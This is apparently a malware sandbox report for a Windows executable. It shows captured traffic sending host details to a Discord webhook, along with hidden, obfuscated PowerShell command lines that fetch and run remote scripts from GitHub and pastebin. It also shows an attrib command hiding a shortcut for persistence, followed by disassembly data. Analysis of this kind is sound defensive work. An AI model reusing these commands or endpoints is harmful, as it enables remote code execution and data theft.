                                                                                                2024-10-15 13:55:05 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                                                Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.362871162.159.138.2324434116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-15 13:55:12 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Content-Type: application/json
                                                                                                Host: discord.com
                                                                                                Content-Length: 297
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-15 13:55:12 UTC297OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 68 61 72 64 7a 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 5f 44 45 45 43 5a 47 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46
                                                                                                Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** _DEECZG\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - F
                                                                                                2024-10-15 13:55:12 UTC1362INHTTP/1.1 204 No Content
                                                                                                Date: Tue, 15 Oct 2024 13:55:12 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Connection: close
                                                                                                set-cookie: __dcfduid=195d74288afd11ef9fd81aa1ab2748bc; Expires=Sun, 14-Oct-2029 13:55:12 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                x-ratelimit-limit: 5
                                                                                                x-ratelimit-remaining: 4
                                                                                                x-ratelimit-reset: 1729000514
                                                                                                x-ratelimit-reset-after: 1
                                                                                                via: 1.1 google
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jGfktjXYcBG3L%2FL6%2BJ7kz%2FPH%2BpPer7x7rK7BwiZR95Cawko7w0kGPHX3tajyNp3aVNNdjEMj6aVEtDsEQrpXf3i9DGKf7elRLUqlWzU0sh%2F%2Bv4IMy6wXPW6ZtJD%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                Set-Cookie: __sdcfduid=195d74288afd11ef9fd81aa1ab2748bcbd98d7a368cedca82998c609e5b314deaa9553717ccd53de5fea6b77dcc88e22; Expires=Sun, 14-Oct-2029 13:55:12 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                Set-Cookie: __cfruid=1832e94ac9fcee6a06a04187ed6d7c37afc16f68-1729000512; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                2024-10-15 13:55:12 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 68 51 59 56 73 5a 36 35 54 35 77 79 6b 38 43 55 6f 33 52 44 41 2e 42 6b 48 65 4b 2e 77 32 2e 57 39 68 42 6c 32 46 5f 5f 65 38 4d 2d 31 37 32 39 30 30 30 35 31 32 38 38 38 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 65 33 33 65 39 33 61 34 36 39 30 2d 44 46 57 0d 0a 0d 0a
                                                                                                Data Ascii: Set-Cookie: _cfuvid=hQYVsZ65T5wyk8CUo3RDA.BkHeK.w2.W9hBl2F__e8M-1729000512888-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304e33e93a4690-DFW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                8192.168.2.362872162.159.138.2324437688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-15 13:55:18 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Content-Type: application/json
                                                                                                Host: discord.com
                                                                                                Content-Length: 297
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-15 13:55:18 UTC297OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 68 61 72 64 7a 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 5f 44 45 45 43 5a 47 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46
                                                                                                Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** _DEECZG\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - F
                                                                                                2024-10-15 13:55:18 UTC1257INHTTP/1.1 404 Not Found
                                                                                                Date: Tue, 15 Oct 2024 13:55:18 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 45
                                                                                                Connection: close
                                                                                                Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                x-ratelimit-limit: 5
                                                                                                x-ratelimit-remaining: 4
                                                                                                x-ratelimit-reset: 1729000520
                                                                                                x-ratelimit-reset-after: 1
                                                                                                via: 1.1 google
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8JUs1QElVF70VthSakJsafJd6%2Bo3mCuroQWk81tyvnvn9PPhLNUkwtJLtsikOZ11fRurFumyk%2FqU3Ux0zOzsxl6HAJNzraythxH%2Bb5y6COTvV2preqRk%2F3GmCQxc"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Set-Cookie: __cfruid=760c3f7f9a8f6b9971b915706863cede5079f7ea-1729000518; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                Set-Cookie: _cfuvid=cSsEV_42yE8w9zOR.P2k92ne3S_DUmteHnQ3wLl0CcU-1729000518872-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d304e5a3a3e4656-DFW
                                                                                                2024-10-15 13:55:18 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:09:54:05
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Users\user\Desktop\Lm9IJ4r9oO.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Lm9IJ4r9oO.exe"
                                                                                                Imagebase:0x670000
                                                                                                File size:199'168 bytes
                                                                                                MD5 hash:032BC4FB50A2D4FC55727D99248B29B2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:2
                                                                                                Start time:09:54:06
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)'
                                                                                                Imagebase:0x8b0000
                                                                                                File size:457'216 bytes
                                                                                                MD5 hash:3F92A35BA26FF7A11A49E15EFE18F0C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:3
                                                                                                Start time:09:54:06
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff720030000
                                                                                                File size:873'472 bytes
                                                                                                MD5 hash:7366FBEFE66BA0F1F5304F7D6FEF09FE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:4
                                                                                                Start time:09:54:08
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)
                                                                                                Imagebase:0x8b0000
                                                                                                File size:457'216 bytes
                                                                                                MD5 hash:3F92A35BA26FF7A11A49E15EFE18F0C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:5
                                                                                                Start time:09:54:08
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff720030000
                                                                                                File size:873'472 bytes
                                                                                                MD5 hash:7366FBEFE66BA0F1F5304F7D6FEF09FE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:7
                                                                                                Start time:09:54:11
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline"
                                                                                                Imagebase:0x890000
                                                                                                File size:2'141'552 bytes
                                                                                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:8
                                                                                                Start time:09:54:11
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF7B.tmp" "c:\Users\user\AppData\Local\Temp\ztufso2n\CSC92EFC5D82192472686D16339634A9CDA.TMP"
                                                                                                Imagebase:0x180000
                                                                                                File size:46'832 bytes
                                                                                                MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:11
                                                                                                Start time:09:54:12
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7676 -s 1932
                                                                                                Imagebase:0xac0000
                                                                                                File size:489'328 bytes
                                                                                                MD5 hash:F5210A4A7E411A1BAD3844586A74B574
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:14
                                                                                                Start time:09:54:47
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                                                Imagebase:0x810000
                                                                                                File size:19'456 bytes
                                                                                                MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:15
                                                                                                Start time:09:54:47
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\forfiles.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                                Imagebase:0x7ff6ce8d0000
                                                                                                File size:52'224 bytes
                                                                                                MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:16
                                                                                                Start time:09:54:47
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff720030000
                                                                                                File size:873'472 bytes
                                                                                                MD5 hash:7366FBEFE66BA0F1F5304F7D6FEF09FE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:17
                                                                                                Start time:09:54:47
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                                Imagebase:0x7ff6f70b0000
                                                                                                File size:486'400 bytes
                                                                                                MD5 hash:DFD66604CA0898E8E26DF7B1635B6326
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:18
                                                                                                Start time:09:54:50
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                                Imagebase:0x7ff6f70b0000
                                                                                                File size:486'400 bytes
                                                                                                MD5 hash:DFD66604CA0898E8E26DF7B1635B6326
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:19
                                                                                                Start time:09:54:55
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\forfiles.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                                Imagebase:0x7ff6ce8d0000
                                                                                                File size:52'224 bytes
                                                                                                MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:20
                                                                                                Start time:09:54:55
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff720030000
                                                                                                File size:873'472 bytes
                                                                                                MD5 hash:7366FBEFE66BA0F1F5304F7D6FEF09FE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:21
                                                                                                Start time:09:54:55
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                                Imagebase:0x7ff6f70b0000
                                                                                                File size:486'400 bytes
                                                                                                MD5 hash:DFD66604CA0898E8E26DF7B1635B6326
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:24
                                                                                                Start time:09:54:57
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                                Imagebase:0x7ff6f70b0000
                                                                                                File size:486'400 bytes
                                                                                                MD5 hash:DFD66604CA0898E8E26DF7B1635B6326
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:2%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:11.6%
                                                                                                  Total number of Nodes:1314
                                                                                                  Total number of Limit Nodes:5
                                                                                                  execution_graph 16452 6783c0 16453 6783cc ___scrt_is_nonwritable_in_current_image 16452->16453 16480 6785bc 16453->16480 16455 678526 16571 678e10 IsProcessorFeaturePresent 16455->16571 16457 6783d3 16457->16455 16466 6783fd ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 16457->16466 16458 67852d 16575 682374 16458->16575 16463 67841c 16464 67849d 16488 678f25 16464->16488 16466->16463 16466->16464 16554 68234e 16466->16554 16472 6784b8 16560 678f5b GetModuleHandleW 16472->16560 16475 6784c3 16476 6784cc 16475->16476 16562 682329 16475->16562 16565 67872d 16476->16565 16481 6785c5 16480->16481 16581 67888c IsProcessorFeaturePresent 16481->16581 16485 6785d6 16486 6785da 16485->16486 16591 67b69d 16485->16591 16486->16457 16651 679d00 16488->16651 16491 6784a3 16492 681fc7 16491->16492 16653 68baa9 16492->16653 16494 6784ab 16497 6725f0 16494->16497 16496 681fd0 16496->16494 16659 68bd59 16496->16659 17218 674f20 16497->17218 16499 672640 16500 674f20 std::ios_base::_Init 42 API calls 16499->16500 16501 672674 16500->16501 16502 674f20 std::ios_base::_Init 42 API calls 16501->16502 16503 6726a8 16502->16503 16504 674f20 std::ios_base::_Init 42 API calls 16503->16504 16505 6726dc 16504->16505 16506 674f20 std::ios_base::_Init 42 API calls 16505->16506 16507 672710 16506->16507 16508 67272d 16507->16508 16509 672ddb 16507->16509 16512 67279f 16508->16512 16514 6727e7 16508->16514 16515 6727f4 16508->16515 16518 6727b2 _Yarn 16508->16518 16510 672de0 16509->16510 17352 6712e0 16509->17352 17357 671240 16510->17357 17327 67829a 16512->17327 16514->16510 16514->16512 16515->16518 16521 67829a std::_Facet_Register 42 API calls 16515->16521 16516 672de5 17363 67ec03 16516->17363 16518->16516 16525 672882 _Yarn 16518->16525 17337 675590 16518->17337 16520 672dea 16522 67ec03 std::ios_base::_Init 41 API calls 16520->16522 16521->16518 16523 672def 16522->16523 16526 67ec03 std::ios_base::_Init 41 API calls 16523->16526 16527 675590 std::ios_base::_Init 42 API calls 16525->16527 16528 67292a _Yarn 16525->16528 16530 672df4 16526->16530 16527->16528 16529 675590 std::ios_base::_Init 42 API calls 16528->16529 16533 6729d2 _Yarn messages 16528->16533 16529->16533 16536 672e5e 16530->16536 17368 674460 16530->17368 16531 672b1b messages 16534 674f20 std::ios_base::_Init 42 API calls 16531->16534 16533->16516 16533->16531 16539 672b50 16534->16539 16538 672eb6 16536->16538 17378 674b70 16536->17378 17417 672000 16538->17417 16539->16520 16540 672b8f Sleep 16539->16540 16541 672b85 messages 16539->16541 17234 6720d0 16540->17234 16541->16540 16543 672f6f 16543->16472 16544 672f5f 16544->16543 17428 674580 16544->17428 16545 672bbb 16547 672bc7 VirtualAlloc 16545->16547 16549 672c04 messages 16545->16549 16548 672be1 _Yarn 16547->16548 16547->16549 16550 672bf2 VirtualFree 16548->16550 16549->16523 16551 672db9 messages 16549->16551 16550->16549 16552 678287 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 16551->16552 16553 672dd5 16552->16553 16553->16472 16555 682364 ___scrt_is_nonwritable_in_current_image std::_Locinfo::_Locinfo_ctor 16554->16555 16555->16464 16556 685bda __Getctype 41 API calls 16555->16556 16559 684019 16556->16559 16557 68128d CallUnexpected 41 API calls 16558 684043 16557->16558 16559->16557 16561 6784bf 16560->16561 16561->16458 16561->16475 17862 6821a8 16562->17862 16566 678739 16565->16566 16567 6784d4 16566->16567 17933 683f79 16566->17933 16567->16463 16569 678747 16570 67b69d ___scrt_uninitialize_crt 7 API calls 16569->16570 16570->16567 16572 678e26 __fread_nolock CallUnexpected 16571->16572 16573 678ed1 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16572->16573 16574 678f15 CallUnexpected 16573->16574 16574->16458 16576 6821a8 CallUnexpected 21 API calls 16575->16576 16577 678533 16576->16577 16578 682338 16577->16578 16579 6821a8 CallUnexpected 21 API calls 16578->16579 16580 67853b 16579->16580 16582 6785d1 16581->16582 16583 67b67e 16582->16583 16597 67c757 16583->16597 16587 67b68f 16588 67b69a 16587->16588 16611 67c793 16587->16611 16588->16485 16590 67b687 16590->16485 16592 67b6a6 16591->16592 16593 67b6b0 16591->16593 16594 67b816 ___vcrt_uninitialize_ptd 6 API calls 16592->16594 16593->16486 16595 67b6ab 16594->16595 16596 67c793 ___vcrt_uninitialize_locks DeleteCriticalSection 16595->16596 16596->16593 16598 67c760 16597->16598 16600 67c789 16598->16600 16602 67b683 16598->16602 16615 67c99c 16598->16615 16601 67c793 ___vcrt_uninitialize_locks DeleteCriticalSection 16600->16601 16601->16602 16602->16590 16603 67b7e3 16602->16603 16632 67c8ad 16603->16632 16606 67b7f8 16606->16587 16609 67b813 16609->16587 16612 67c7bd 16611->16612 16613 67c79e 16611->16613 16612->16590 16614 67c7a8 DeleteCriticalSection 16613->16614 16614->16612 16614->16614 16620 67c7c2 16615->16620 16618 67c9d4 InitializeCriticalSectionAndSpinCount 16619 67c9bf 16618->16619 16619->16598 16621 67c7df 16620->16621 16624 67c7e3 16620->16624 16621->16618 16621->16619 16622 67c84b GetProcAddress 16622->16621 16624->16621 16624->16622 16625 67c83c 16624->16625 16627 67c862 LoadLibraryExW 16624->16627 16625->16622 16626 67c844 FreeLibrary 16625->16626 16626->16622 16628 67c8a9 16627->16628 16629 67c879 GetLastError 16627->16629 16628->16624 16629->16628 16630 67c884 ___vcrt_FlsSetValue 16629->16630 16630->16628 16631 67c89a LoadLibraryExW 16630->16631 16631->16624 16633 67c7c2 ___vcrt_FlsSetValue 5 API calls 16632->16633 16634 67c8c7 16633->16634 16635 67c8e0 TlsAlloc 16634->16635 16636 67b7ed 16634->16636 16636->16606 16637 67c95e 16636->16637 16638 67c7c2 ___vcrt_FlsSetValue 5 API calls 